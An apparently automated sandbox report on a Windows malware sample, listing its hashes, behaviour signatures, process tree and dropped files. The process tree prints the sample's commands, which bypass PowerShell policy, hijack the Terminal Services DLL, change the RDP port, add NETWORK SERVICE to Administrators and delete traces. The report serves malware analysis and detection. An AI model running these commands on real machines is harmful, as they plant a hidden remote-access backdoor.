Analysis
-
max time kernel
36s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
12-11-2020 13:52
General
-
Target
6e9e7e6942a4ce7a7a3023cf3f744f7aa2dbed97a2493bc2bb2873be27a8f3fc.exe
-
Size
3.8MB
-
MD5
d050bf835cb8a5267754e565cfb75a3a
-
SHA1
c295f051e7e06717326b4bb98bce41d0ef8b4f5d
-
SHA256
6e9e7e6942a4ce7a7a3023cf3f744f7aa2dbed97a2493bc2bb2873be27a8f3fc
-
SHA512
fe1e2dd16b759223dd271597d10c987ba8a3f42966db96948ece963f769d381ef6874fe5597d3d7a7e3799760db9909d5025765ca6cf488cae9e06908c960fd9
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Deletes itself 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6e9e7e6942a4ce7a7a3023cf3f744f7aa2dbed97a2493bc2bb2873be27a8f3fc.exe"C:\Users\Admin\AppData\Local\Temp\6e9e7e6942a4ce7a7a3023cf3f744f7aa2dbed97a2493bc2bb2873be27a8f3fc.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anrhzsdd\anrhzsdd.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A1C.tmp" "c:\Users\Admin\AppData\Local\Temp\anrhzsdd\CSCE425F2CE15B540869A357924AF68EDCA.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
C:\Users\Admin\AppData\Local\Temp\RES5A1C.tmpMD5
3e8de78a6be2d6d574203e4628e02b93
SHA1fd9fa3eec97f2df9c3f0cd1d0464c3f890fb02fb
SHA2564909e12031a2863a6f0a8f0b793029b955a2a22e7c442b938f9b9d9dc223e570
SHA51242790791dd5588ef721a68199ab447380128d0fec1b6ccdbb6b09a4ce6b9cd8cae00d5703807b982c66940dda9b20535c42f24c22cb8e767625be7b568e9e004
-
C:\Users\Admin\AppData\Local\Temp\anrhzsdd\anrhzsdd.dllMD5
7740edd656cbb16eb603c8b55591c5a0
SHA1c88891df1d5991c640609c918a61d86e18c576e2
SHA256a98284dc1ec517f8dc695a20ce4671bc64a1c9c608aec3bea69ab286157079b8
SHA5122951d0474c45972cdc953880b12a4456a516ad9b94125098800af2922764bb42588d846ebbc5e6350546073ae8880fabf20af08787f030e6c84516129cf29112
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
851bf8df96899b2cc50af8047e9fbe5c
SHA1e259d3ea9eabae926f74358b6e8f583cfcb4106b
SHA256b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6
SHA512648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792
-
\??\c:\Users\Admin\AppData\Local\Temp\anrhzsdd\CSCE425F2CE15B540869A357924AF68EDCA.TMPMD5
d98973da8c9d6b3944f2c84adb9fb0e1
SHA1473809d0af53db6431dbd33ef7f69206e853a94b
SHA256b99f99afab58a4d8cba4b565ee06cbd618fdea53e5f75512dc6b93808bd37e0a
SHA5122e181bac918d7ba7e165f795813fe490dad4c75077e65537647314d9162260a4b92f55099f885038e397f38776b7ca050962f96da6dab680fb4aa4016345aa92
-
\??\c:\Users\Admin\AppData\Local\Temp\anrhzsdd\anrhzsdd.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\anrhzsdd\anrhzsdd.cmdlineMD5
3015d61b9518b820ce041d362b0ce1c1
SHA18990740c65f1fccc6980f972f1f45d3f08170194
SHA256ab94a9311554935f70a6619cce2c1fa7ed94618ce421d15240349aa736d517ca
SHA51255d83fef44ff539a1f70ca29c90f456bc2b213adabe4c8ded9ebb9f038df16634c777c02d2c34686bc9181edb7d128abaa9b3e37b3aa62de3c486437beaf8d0b
-
memory/420-116-0x0000000000000000-mapping.dmp
-
memory/504-46-0x0000000008C30000-0x0000000008C31000-memory.dmpFilesize
4KB
-
memory/504-43-0x0000000008980000-0x0000000008981000-memory.dmpFilesize
4KB
-
memory/504-48-0x0000000008C20000-0x0000000008C21000-memory.dmpFilesize
4KB
-
memory/504-24-0x0000000073F60000-0x000000007464E000-memory.dmpFilesize
6.9MB
-
memory/504-45-0x0000000008C90000-0x0000000008C91000-memory.dmpFilesize
4KB
-
memory/504-44-0x0000000008AE0000-0x0000000008AE1000-memory.dmpFilesize
4KB
-
memory/504-23-0x0000000000000000-mapping.dmp
-
memory/504-35-0x00000000089A0000-0x00000000089D3000-memory.dmpFilesize
204KB
-
memory/732-17-0x0000000000000000-mapping.dmp
-
memory/752-51-0x0000000073F60000-0x000000007464E000-memory.dmpFilesize
6.9MB
-
memory/752-50-0x0000000000000000-mapping.dmp
-
memory/1004-113-0x0000000000000000-mapping.dmp
-
memory/1156-78-0x0000000073F60000-0x000000007464E000-memory.dmpFilesize
6.9MB
-
memory/1156-77-0x0000000000000000-mapping.dmp
-
memory/1216-117-0x0000000000000000-mapping.dmp
-
memory/1368-121-0x0000000000000000-mapping.dmp
-
memory/1848-13-0x0000000009340000-0x0000000009341000-memory.dmpFilesize
4KB
-
memory/1848-3-0x0000000007570000-0x0000000007571000-memory.dmpFilesize
4KB
-
memory/1848-21-0x00000000093A0000-0x00000000093A1000-memory.dmpFilesize
4KB
-
memory/1848-133-0x0000000009800000-0x0000000009801000-memory.dmpFilesize
4KB
-
memory/1848-0-0x0000000000000000-mapping.dmp
-
memory/1848-12-0x000000000BDB0000-0x000000000BDB1000-memory.dmpFilesize
4KB
-
memory/1848-10-0x0000000008540000-0x0000000008541000-memory.dmpFilesize
4KB
-
memory/1848-9-0x00000000087B0000-0x00000000087B1000-memory.dmpFilesize
4KB
-
memory/1848-8-0x0000000007C60000-0x0000000007C61000-memory.dmpFilesize
4KB
-
memory/1848-7-0x0000000007F50000-0x0000000007F51000-memory.dmpFilesize
4KB
-
memory/1848-6-0x0000000007EE0000-0x0000000007EE1000-memory.dmpFilesize
4KB
-
memory/1848-5-0x0000000007CF0000-0x0000000007CF1000-memory.dmpFilesize
4KB
-
memory/1848-106-0x00000000094A0000-0x00000000094A1000-memory.dmpFilesize
4KB
-
memory/1848-107-0x0000000009AB0000-0x0000000009AB1000-memory.dmpFilesize
4KB
-
memory/1848-1-0x0000000073F60000-0x000000007464E000-memory.dmpFilesize
6.9MB
-
memory/1848-2-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/1848-22-0x0000000007150000-0x0000000007151000-memory.dmpFilesize
4KB
-
memory/1848-4-0x0000000007500000-0x0000000007501000-memory.dmpFilesize
4KB
-
memory/2044-119-0x0000000000000000-mapping.dmp
-
memory/2240-108-0x0000000000000000-mapping.dmp
-
memory/2456-111-0x0000000000000000-mapping.dmp
-
memory/2712-115-0x0000000000000000-mapping.dmp
-
memory/3012-122-0x0000000000000000-mapping.dmp
-
memory/3116-114-0x0000000000000000-mapping.dmp
-
memory/3548-112-0x0000000000000000-mapping.dmp
-
memory/3744-110-0x0000000000000000-mapping.dmp
-
memory/3888-14-0x0000000000000000-mapping.dmp
-
memory/3900-120-0x0000000000000000-mapping.dmp
-
memory/3960-109-0x0000000000000000-mapping.dmp
-
memory/3996-118-0x0000000000000000-mapping.dmp